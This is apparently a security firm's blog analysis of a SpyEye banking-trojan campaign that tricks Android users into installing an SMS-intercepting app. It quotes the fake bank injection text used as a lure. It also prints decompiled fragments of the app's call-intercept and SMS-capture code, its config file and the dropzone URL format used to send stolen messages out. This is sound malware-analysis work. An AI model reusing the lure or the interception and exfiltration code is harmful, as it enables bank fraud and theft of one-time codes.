SpyEye and Man in the Mobile

On the 2nd of September, the S21sec e-crime team detected a Spyeye sample actively using a MitMo type fraud scheme against Smartphones with the Android Operating System. The binary does show any noteworthy improvement, but the novelty lies in the injection employed to persuade the victim to install the malicious application on their mobile:
(Translated from Spanish)

With regard to the numerous cases of mobile phone card cloning and theft of money from our clients’ accounts, we are obliged to inform and protect all our clients from this.

To fight against this, we have developed an application that protects your telephone from SMS interception and completely guarantees the security of your mobile telephone. The application functions only on mobile telephones that use the Android platform. The holders of these telephones can now set up the application and have problem free access to their account through Internet banking. Users who do not have mobile phones which work on the Android platform, will be forced to buy them for problem free account access and protection from scammers. Until the application is activated on your mobile telephone, you will not be able to access the account through Internet banking.

It is inconvenient, but it is the only way to permit your money to be kept securely. We understand that not everyone has a telephone based on Android, but only this platform is capable of providing the necessary security against this type of fraud. As soon as you have bought a phone that uses the Android platform, return, once again, into your internet banking to download and activate the application on your phone. After this, access to the account via the Internet will be completely unblocked and you will be able to use it.


- Important! The telephone number tied to your account (updated for SMS and signatures) must be used on your Android mobile. It is necessary to insert your mobile phone card into the phone that uses Android.

- Telephones based on Android are sold by all mobile telephone sellers in your country. Any model will suffice.

If you have an Android phone or you have bought one already, we ask that you proceed to installing the application on your mobile phone.

We are concerned about your security.

Kind Regards.

Application setup

To set up the application and the security for Internet banking usage, you have to open the browser on your Android mobile phone.

To install the application you must connect to the Internet. If you do not know how to configure the Internet on your phone, please contact your cell phone operator.

1. In your browser’s address bar, enter the following reference to download the application

2. After downloading the application, an arrow should appear pointing downwards in the upper left hand corner of the screen.

3. Open the Warnings after pulling the menu down and start up the application.

4. Once the application is running, press Install. That’s it! The application has been successfully installed on your mobile phone!

5. Now you still need to authorise the telephone in your bank’s security system.

Enter the number 325000 and press call. A 6 digit code should appear on the phone screen.

Type those digits into the field below and that ends the process of activating the application.

The generated code:

As you will appreciate, this time they persuade the victim to visit a link from their mobile phone, to request a 6 digit number provided by the malicious application, to simulate associating the phone to the bank account. In reality, it is a false number that appears hard coded in the source code.

if (!paramIntent.getAction().equals("android.intent.action.NEW_OUTGOING_CALL"))
if (!paramIntent.getStringExtra("android.intent.extra.PHONE_NUMBER").equals("325000"))
Toast.makeText(paramContext, "251340", 0).show();

Subsequently, in communications with the dropzone, it sends the telephone’s MSISDN number. They do not associate the infection of the mobile device with the victim’s PC.

The main function of the malicious application resides in capturing the incoming and outgoing SMSs to then forward them to the attacker. The victim does not receive the SMS messages and they are forwarded directly to the fraudster. Given that there is no association with the previous infection of the PC and/or the victim’s account, it is assumed that previously obtained credentials (through the Trojan) are used to make a fraudulent transfer and receive the mobile token that is immediately forwarded to the victim’s device.

The permissions sought by the Manifest file at application installation time are as follows:

The application is installed as System and is not visible alongside other applications and, although visible in a list of them, would not be easily detected due to the choice of icon and cryptic name:

It has a configuration file called settings.xml as shown below:

<?xml version="1.0" encoding="UTF-8"?>
<send value="1"/>
<telephone value="123"/>
<addr value=""/>
<addr value=""/>
<addr value=""/>
<addr value=""/>
  • send: this value indicates whether information will be
    transmitted via sending to a dropzone, sending an SMS or both (by default configured to send by HTTP GET)
  • telephone: The destination telephone number (by default fictitious)
  • http: Addresses where the results are sent.

In addition, for sending by HTTP, a string is prepared and sent to the dropzones in the following format:

  • dropzone/gate.php?sender=&receiver=&text=.

str1 = ((TelephonyManager)paramContext.getSystemService("phone")).getLine1Number();
str2 = arrayOfSmsMessage[0].getDisplayOriginatingAddress();
str3 = arrayOfSmsMessage[0].getMessageBody();
if (this.numbers.size() != 0)
performAction(str2, str1, str3);

Once sent, the application receives the responses from the server, but does not process them, so we do not believe that the dropzones communicate directly with the application.
Finally, the sending of the SMS from the victim’s phone would be done using the following format: sms_dir_origen : sms_body

S21sec has already taken the appropriate measures to close down the malicious site.

Ismael García & Santiago Vicente
S21sec e-crime

Deja un comentario